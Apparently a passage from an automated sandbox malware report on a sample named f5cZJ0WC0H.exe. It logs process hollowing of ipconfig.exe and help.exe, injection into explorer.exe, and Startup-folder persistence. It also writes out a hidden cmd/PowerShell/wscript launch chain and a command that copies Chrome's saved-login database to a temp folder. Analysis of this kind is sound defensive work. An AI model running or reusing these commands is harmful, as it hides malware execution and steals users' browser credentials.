          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E070D mov eax, dword ptr fs:[00000030h]21_2_011E070D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A70E mov eax, dword ptr fs:[00000030h]21_2_0114A70E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A70E mov eax, dword ptr fs:[00000030h]21_2_0114A70E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114E730 mov eax, dword ptr fs:[00000030h]21_2_0114E730
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01114F2E mov eax, dword ptr fs:[00000030h]21_2_01114F2E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01114F2E mov eax, dword ptr fs:[00000030h]21_2_01114F2E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112EF40 mov eax, dword ptr fs:[00000030h]21_2_0112EF40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112FF60 mov eax, dword ptr fs:[00000030h]21_2_0112FF60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8F6A mov eax, dword ptr fs:[00000030h]21_2_011E8F6A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01128794 mov eax, dword ptr fs:[00000030h]21_2_01128794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011537F5 mov eax, dword ptr fs:[00000030h]21_2_011537F5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A61C mov eax, dword ptr fs:[00000030h]21_2_0114A61C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A61C mov eax, dword ptr fs:[00000030h]21_2_0114A61C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01148E00 mov eax, dword ptr fs:[00000030h]21_2_01148E00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1608 mov eax, dword ptr fs:[00000030h]21_2_011D1608
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CFE3F mov eax, dword ptr fs:[00000030h]21_2_011CFE3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111E620 mov eax, dword ptr fs:[00000030h]21_2_0111E620
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAE44 mov eax, dword ptr fs:[00000030h]21_2_011DAE44
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAE44 mov eax, dword ptr fs:[00000030h]21_2_011DAE44
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112766D mov eax, dword ptr fs:[00000030h]21_2_0112766D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFE87 mov eax, dword ptr fs:[00000030h]21_2_011AFE87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011946A7 mov eax, dword ptr fs:[00000030h]21_2_011946A7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8ED6 mov eax, dword ptr fs:[00000030h]21_2_011E8ED6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01158EC7 mov eax, dword ptr fs:[00000030h]21_2_01158EC7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011436CC mov eax, dword ptr fs:[00000030h]21_2_011436CC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CFEC0 mov eax, dword ptr fs:[00000030h]21_2_011CFEC0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011276E2 mov eax, dword ptr fs:[00000030h]21_2_011276E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011416E0 mov ecx, dword ptr fs:[00000030h]21_2_011416E0
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 9D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: B20000Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'Jump to behavior
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000016.00000000.365675313.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\Desktop\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
